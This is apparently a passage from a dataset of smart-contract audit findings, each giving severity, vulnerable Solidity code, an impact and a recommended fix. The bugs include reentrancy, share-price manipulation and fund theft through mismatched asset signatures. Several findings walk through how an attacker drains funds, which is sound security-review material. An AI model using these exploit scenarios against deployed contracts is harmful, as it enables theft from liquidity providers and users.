above.чAdmin settings would be updated within a short period of delay so that users wouldn't react properly.ч```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n -Unnecessary precision loss in `_recipientBalance()`чmediumчUsing `ratePerSecond()` to calculate the `_recipientBalance()` incurs an unnecessary precision loss.\\nThe current formula in `_recipientBalance()` to calculate the vested amount (balance) incurs an unnecessary precision loss, as it includes div before mul:\\n```\\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n\\nThis can be avoided and the improved formula can also save some gas.чConsdier changing to:\\n```\\nbalance = elapsedTime_ * tokenAmount_ / duration\\n```\\nчPrecision loss in `_recipientBalance()`.ч```\\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n -The ````Stream```` contract is designed to receive ETH but not implement function for withdrawalчmediumчThe `Stream` contract instances can receive ETH but can not withdraw, ETH occasionally sent by users will be stuck in those contracts.\\nShown as the test case, it can receive ETH normally.\\n```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}(\"\");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n\\nResult\\n```\\nRunning 1 test for test/Stream.t.sol:StreamReceiveETHTest\\n[PASS] test_receiveETH() (gas: 167691)\\nTest result: ok. 1 passed; 0 failed; finished in 1.25ms\\n```\\nчIssue The `Stream` contract is designed to receive ETH but not implement function for withdrawal\\nAdd a `rescueETH()` function which is similar with the existing `rescueERC20()`чSee Summaryч```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}(\"\");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n -If the recipient is added to the USDC blacklist, then cancel() does not workчmediumчcancel() will send the vested USDC to the recipient, if the recipient is added to the USDC blacklist, then cancel() will not work\\nWhen cancel() is called, it sends the vested USDC to the recipient and cancels future payments. Consider a scenario where if the payer intends to call cancel() to cancel the payment stream, a malicious recipient can block the address from receiving USDC by adding it to the USDC blacklist (e.g. by doing something malicious with that address, etc.), which prevents the payer from canceling the payment stream and withdrawing future payments\\n```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\nчIssue If the recipient is added to the USDC blacklist, then cancel() does not work\\nInstead of sending tokens directly to the payer or recipient in cancel(), consider storing the number of tokens in variables and having the payer or recipient claim it laterчA malicious recipient may prevent the payer from canceling the payment stream and withdrawing future paymentsч```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n -Adverary can DOS contract by making a large number of deposits/withdraws then removing them allчhighчWhen a user dequeues a withdraw or deposit it leaves a blank entry in the withdraw/deposit. This entry must be read from memory and skipped when processing the withdraws/deposits which uses gas for each blank entry. An adversary could exploit this to DOS the contract. By making a large number of these blank deposits they could make it impossible to process any auction.\\n```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n\\nThe code above processes deposits in the order they are submitted. An adversary can exploit this by withdrawing/depositing a large number of times then dequeuing them to create a larger number of blank deposits. Since these are all zero, it creates a fill or kill scenario. Either all of them are skipped or none. If the adversary makes the list long enough then it will be impossible to fill without going over block gas limit.чTwo potential solutions. The first would be to limit the number of deposits/withdraws that can be processed in a single netting. The second would be to allow the owner to manually skip withdraws/deposits by calling an function that increments depositsIndex and withdrawsIndex.чContract can be permanently DOS'dч```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n -resolveQueuedTrades() ERC777 re-enter to steal fundsчmediumч_openQueuedTrade() does not follow the “Checks Effects Interactions” principle and may lead to re-entry to steal the funds\\nThe prerequisite is that tokenX is ERC777 e.g. “sushi”\\nresolveQueuedTrades() call _openQueuedTrade()\\nin _openQueuedTrade() call \"tokenX.transfer(queuedTrade.user)\" if (revisedFee < queuedTrade.totalFee) before set queuedTrade.isQueued = false;\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n\\n3.if ERC777 re-enter to #cancelQueuedTrade() to get tokenX back,it can close, because queuedTrade.isQueued still equal true 4. back to _openQueuedTrade() set queuedTrade.isQueued = false 5.so steal tokenXчfollow “Checks Effects Interactions”\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n+ queuedTrade.isQueued = false; \\n // Transfer the fee to the target options contract\\n IERC20 tokenX = IERC20(optionsContract.tokenX());\\n tokenX.transfer(queuedTrade.targetContract, revisedFee);\\n\\n- queuedTrade.isQueued = false; \\n emit OpenTrade(queuedTrade.user, queueId, optionId);\\n }\\n```\\nчif tokenX equal ERC777 can steal tokenч```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n -The `_fee()` function is wrongly implemented in the codeчmediumч_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDCчThe `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\nчThe protocol will earn fees less than expectedч```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n -resolveQueuedTrades is intended to be non atomic but invalid signature can still cause entire transaction to revertчmediumчBufferRouter#resolveQueuedTrades and unlockOptions attempt to be non atomic (i.e. doesn't revert the transaction if one fails) but an invalid signature can still cause the entire transaction to revert, because the ECDSA.recover sub call in _validateSigner can still revert.\\n```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n\\n_validateSigner can revert at the ECDSA.recover sub call breaking the intended non atomic nature of BufferRouter#resolveQueuedTrades and unlockOptions.чUse a try statement inside _validateSigner to avoid any reverts:\\n```\\n function _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n ) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n- address recoveredSigner = ECDSA.recover(digest, signature);\\n\\n+ try ECDSA.recover(digest, signature) returns (address recoveredSigner) {\\n+ return recoveredSigner == publisher;\\n+ } else {\\n+ return false;\\n+ }\\n }\\n```\\nчBufferRouter#resolveQueuedTrades and unlockOptions don't function as intended if signature is malformedч```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n -When private keeper mode is off users can queue orders with the wrong assetчhighчAfter an order is initiated, it must be filled by calling resolveQueuedTrades. This function validates that the asset price has been signed but never validates that the asset being passed in matches the asset of the queuedTrade. When private keeper mode is off, which is the default state of the contract, this can be abused to cause huge loss of funds.\\n```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n \"Router: Signature didn't match\"\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n \"Wait time too high\"\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n\\nBufferRouter#resolveQueueTrades never validates that the asset passed in for params is the same asset as the queuedTrade. It only validates that the price is the same, then passes the price and queueId to _openQueuedTrade:\\n```\\nfunction _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n QueuedTrade storage queuedTrade = queuedTrades[queueId];\\n IBufferBinaryOptions optionsContract = IBufferBinaryOptions(\\n queuedTrade.targetContract\\n );\\n\\n bool isSlippageWithinRange = optionsContract.isStrikeValid(\\n queuedTrade.slippage,\\n price,\\n queuedTrade.expectedStrike\\n );\\n\\n if (!isSlippageWithinRange) {\\n _cancelQueuedTrade(queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n queueId,\\n \"Slippage limit exceeds\"\\n );\\n\\n return;\\n }\\n\\n // rest of code\\n\\n optionParams.totalFee = revisedFee;\\n optionParams.strike = price;\\n optionParams.amount = amount;\\n\\n uint256 optionId = optionsContract.createFromRouter(\\n optionParams,\\n isReferralValid\\n );\\n```\\n\\nInside _openQueuedTrade it checks that the price is within the slippage bounds of the order, cancelling if its not. Otherwise it uses the price to open an option. According to documentation, the same router will be used across a large number of assets/pools, which means the publisher for every asset is the same, given that router only has one publisher variable.\\nExamples:\\nImagine two assets are listed that have close prices, asset A = $0.95 and asset B = $1. An adversary could create an call that expires in 10 minutes on asset B with 5% slippage, then immediately queue it with the price of asset A. $0.95 is within the slippage bounds so it creates the option with a strike price of $0.95. Since the price of asset B is actually $1 the adversary will almost guaranteed make money, stealing funds from the LPs. This can be done back and forth between both pools until pools for both assets are drained.\\nIn a similar scenario, if the price of the assets are very different, the adversary could use this to DOS another user by always calling queue with the wrong asset, causing the order to be cancelled.чPass the asset address through so the BufferBinaryOptions contract can validate it is being called with the correct assetчAdversary can rug LPs and DOS other usersч```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n \"Router: Signature didn't match\"\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n \"Wait time too high\"\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n -Early depositors to BufferBinaryPool can manipulate exchange rates to steal funds from later depositorsчhighчTo calculate the exchange rate for shares in BufferBinaryPool it divides the total supply of shares by the totalTokenXBalance of the vault. The first deposit can mint a very small number of shares then donate tokenX to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalTokenXBalance, which leaves it vulnerable to exchange rate manipulation. As an example, assume tokenX == USDC. An adversary can mint a single share, then donate 1e8 USDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 USDC) will suffer from precision loss and the attackers share will benefit from it.чRequire a small minimum deposit (i.e. 1e6)чAdversary can effectively steal funds from later users through precision lossч```\\nfunction totalTokenXBalance()\\n public\\n view\\n override\\n returns (uint256 balance)\\n{\\n return tokenX.balanceOf(address(this)) - lockedPremium;\\n}\\n```\\n -When tokenX is an ERC777 token, users can bypass maxLiquidityчmediumчWhen tokenX is an ERC777 token, users can use callbacks to provide liquidity exceeding maxLiquidity\\nIn BufferBinaryPool._provide, when tokenX is an ERC777 token, the tokensToSend function of account will be called in tokenX.transferFrom before sending tokens. When the user calls provide again in tokensToSend, since BufferBinaryPool has not received tokens at this time, totalTokenXBalance() has not increased, and the following checks can be bypassed, so that users can provide liquidity exceeding maxLiquidity.\\n```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n```\\nчChange to\\n```\\n function _provide(\\n uint256 tokenXAmount,\\n uint256 minMint,\\n address account\\n ) internal returns (uint256 mint) {\\n// Add the line below\\n bool success = tokenX.transferFrom(\\n// Add the line below\\n account,\\n// Add the line below\\n address(this),\\n// Add the line below\\n tokenXAmount\\n// Add the line below\\n );\\n uint256 supply = totalSupply();\\n uint256 balance = totalTokenXBalance();\\n\\n require(\\n balance // Add the line below\\n tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n\\n if (supply > 0 && balance > 0)\\n mint = (tokenXAmount * supply) / (balance);\\n else mint = tokenXAmount * INITIAL_RATE;\\n\\n require(mint >= minMint, \"Pool: Mint limit is too large\");\\n require(mint > 0, \"Pool: Amount is too small\");\\n\\n// Remove the line below\\n bool success = tokenX.transferFrom(\\n// Remove the line below\\n account,\\n// Remove the line below\\n address(this),\\n// Remove the line below\\n tokenXAmount\\n// Remove the line below\\n );\\n```\\nчusers can provide liquidity exceeding maxLiquidity.ч```\\n require(\\n balance + tokenXAmount <= maxLiquidity,\\n \"Pool has already reached it's max limit\"\\n );\\n```\\n -Limited support to a specific subset of ERC20 tokensчmediumчBuffer contest states 'any ERC20 supported', therefore it should take into account all the different ways of signalling success and failure. This is not the case, as all ERC20's transfer(), transferFrom(), and approve() functions are either not verified at all or verified for returning true. As a result, depending on the ERC20 token, some transfer errors may result in passing unnoticed, and/or some successfull transfer may be treated as failed.\\nCurrently the only supported ERC20 tokens are the ones that fulfill both the following requirements:\\nalways revert on failure;\\nalways returns boolean true on success.\\nAn example of a very well known token that is not supported is Tether USD (USDT).\\n👋 IMPORTANT This issue is not the same as reporting that \"return value must be verified to be true\" where the checks are missing! Indeed such a simplistic report should be considered invalid as it still does not solve all the problems but rather introduces others. See Vulnerability Details section for rationale.\\nTokens have different ways of signalling success and failure, and this affect mostly transfer(), transferFrom() and approve() in ERC20 tokens. While some tokens revert upon failure, others consistently return boolean flags to indicate success or failure, and many others have mixed behaviours.\\nSee below a snippet of the USDT Token contract compared to the 0x's ZRX Token contract where the USDT Token transfer function does not even return a boolean value, while the ZRX token consistently returns boolean value hence returning false on failure instead of reverting.\\nUSDT Token snippet (no return value) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n\\nZRX Token snippet (consistently true or false boolean result) from Etherscan\\n```\\nfunction transferFrom(address _from, address _to, uint _value) returns (bool) {\\n if (balances[_from] >= _value && allowed[_from][msg.sender] >= _value && balances[_to] + _value >= balances[_to]) {\\n balances[_to] += _value;\\n balances[_from] -= _value;\\n allowed[_from][msg.sender] -= _value;\\n Transfer(_from, _to, _value);\\n return true;\\n } else { return false; }\\n}\\n```\\nчTo handle most of these inconsistent behaviors across multiple tokens, either use OpenZeppelin's SafeERC20 library, or use a more reusable implementation (i.e. library) of the following intentionally explicit, descriptive example code for an ERC20 transferFrom() call that takes into account all the different ways of signalling success and failure, and apply to all ERC20 transfer(), transferFrom(), approve() calls in the Buffer contracts.\\n```\\nIERC20 token = whatever_token;\\n\\n(bool success, bytes memory returndata) = address(token).call(abi.encodeWithSelector(IERC20.transferFrom.selector, sender, recipient, amount));\\n\\n// if success == false, without any doubts there was an error and callee reverted\\nrequire(success, \"Transfer failed!\");\\n\\n// if success == true, we need to check whether we got a return value or not (like in the case of USDT)\\nif (returndata.length > 0) {\\n // we got a return value, it must be a boolean and it should be true\\n require(abi.decode(returndata, (bool)), \"Transfer failed!\");\\n} else {\\n // since we got no return value it can be one of two cases:\\n // 1. the transferFrom does not return a boolean and it did succeed\\n // 2. the token address is not a contract address therefore call() always return success = true as per EVM design\\n // To discriminate between 1 and 2, we need to check if the address actually points to a contract\\n require(address(token).code.length > 0, \"Not a token address!\");\\n}\\n```\\nчGiven the different usages of token transfers in BufferBinaryOptions.sol, BufferBinaryPool.sol, and BufferRouter.sol, there can be 2 types of impacts depending on the ERC20 contract being traded.\\nThe ERC20 token being traded is one that consistently returns a boolean result in the case of success and failure like for example 0x's ZRX Token contract. Where the return value is currently not verified to be true (i.e.: #1, #2, #3, #4, #5, #6) the transfer may fail (e.g.: no tokens transferred due to insufficient balance) but the error would not be detected by the Buffer contracts.\\nThe ERC20 token being traded is one that do not return a boolean value like for example the well knonw Tether USD Token contract. Successful transfers would cause a revert in the Buffer contracts where the return value is verified to be true (i.e.: #1, #2, #3, #4) due to the token not returing boolean results.\\nSame is true for appove calls.ч```\\nfunction transferFrom(address _from, address _to, uint _value) public onlyPayloadSize(3 * 32) {\\n var _allowance = allowed[_from][msg.sender];\\n\\n // Check is not needed because sub(_allowance, _value) will already throw if this condition is not met\\n // if (_value > _allowance) throw;\\n\\n uint fee = (_value.mul(basisPointsRate)).div(10000);\\n if (fee > maximumFee) {\\n fee = maximumFee;\\n }\\n if (_allowance < MAX_UINT) {\\n allowed[_from][msg.sender] = _allowance.sub(_value);\\n }\\n uint sendAmount = _value.sub(fee);\\n balances[_from] = balances[_from].sub(_value);\\n balances[_to] = balances[_to].add(sendAmount);\\n if (fee > 0) {\\n balances[owner] = balances[owner].add(fee);\\n Transfer(_from, owner, fee);\\n }\\n Transfer(_from, _to, sendAmount);\\n}\\n```\\n -The `_fee()` function is wrongly implemented in the codeчmediumч_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDCчThe `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\nчThe protocol will earn fees less than expectedч```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n -Bulls that are unable to receive NFTs will not be able to claim them laterчmediumчA lot of care has been taken to ensure that, if a bull has a contract address that doesn't accept ERC721s, the NFT is saved to `withdrawableCollectionTokenId` for later withdrawal. However, because there is no way to withdraw this token to a different address (and the original address doesn't accept NFTs), it will never be able to be claimed.\\nTo settle a contract, the bear calls `settleContract()`, which sends their NFT to the bull, and withdraws the collateral and premium to the bear.\\n```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n\\nIn order to address the case that the bull is a contract that can't accept NFTs, the protocol uses a try-catch setup. If the transfer doesn't succeed, it transfers the NFT into the contract, and sets `withdrawableCollectionTokenId` so that the specific NFT is attributed to the bull for later withdrawal.\\nHowever, assuming the bull isn't an upgradeable contract, this withdrawal will never be possible, because their only option is to call the same function `safeTransferFrom` to the same contract address, which will fail in the same way.\\n```\\nfunction withdrawToken(bytes32 orderHash, uint tokenId) public {\\n address collection = matchedOrders[uint(orderHash)].collection;\\n\\n address recipient = withdrawableCollectionTokenId[collection][tokenId];\\n\\n // Transfer NFT to recipient\\n IERC721(collection).safeTransferFrom(address(this), recipient, tokenId);\\n\\n // This token is not withdrawable anymore\\n withdrawableCollectionTokenId[collection][tokenId] = address(0);\\n\\n emit WithdrawnToken(orderHash, tokenId, recipient);\\n}\\n```\\nчThere are a few possible solutions:\\nAdd a `to` field in the `withdrawToken` function, which allows the bull `to` withdraw the NFT `to` another address\\nCreate a function similar `to` `transferPosition` that can be used `to` transfer owners of a withdrawable NFT\\nDecide that you want `to` punish bulls who aren't able `to` receive NFTs, in which case there is no need `to` save their address or implement a `withdrawToken` functionчIf a bull is a contract that can't receive NFTs, their orders will be matched, the bear will be able to withdraw their assets, but the bull's NFT will remain stuck in the BVB protocol contract.ч```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n // Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n -Attackers can use `reclaimContract()` to transfer assets in protocol to address(0)чhighч`reclaimContract()` would transfer payment tokens to `bulls[contractId]`. An attacker can make `reclaimContract()` transfer assets to address(0).\\nAn attacker can use a fake order to trick `reclaimContract()`. The fake order needs to meet the following requirements:\\n`block.timestamp > order.expiry`.\\n`!settledContracts[contractId]`.\\n`!reclaimedContracts[contractId],`.\\nThe first one is easy to fulfilled, an attacker can decide the content of the fake order. And the others are all satisfied since the fake order couldn't be settled or reclaimed before.\\n```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, \"NOT_EXPIRED_CONTRACT\");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], \"SETTLED_CONTRACT\");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], \"RECLAIMED_CONTRACT\");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\nчThere are multiple solutions for this problem.\\ncheck `bulls[contractId] != address(0)`\\ncheck the order is matched `matchedOrders[contractId].maker != address(0)`чAn attacker can use this vulnerability to transfer assets from BvB to address(0). It results in serious loss of funds.ч```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, \"NOT_EXPIRED_CONTRACT\");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], \"SETTLED_CONTRACT\");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], \"RECLAIMED_CONTRACT\");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n -Transferring Ownership Might Break The MarketчmediumчAfter the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.\\nThe `callbackAuthorized` mapping contains a list of whitelisted market owners authorized to use the callback. When the users call the `purchaseBond` function, it will check at Line 390 if the current market owner is still authorized to use a callback. Otherwise, the function will revert.\\n```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n\\nHowever, if the market owner transfers the market ownership to someone else. The market will stop working because the new market owner might not be on the list of whitelisted market owners 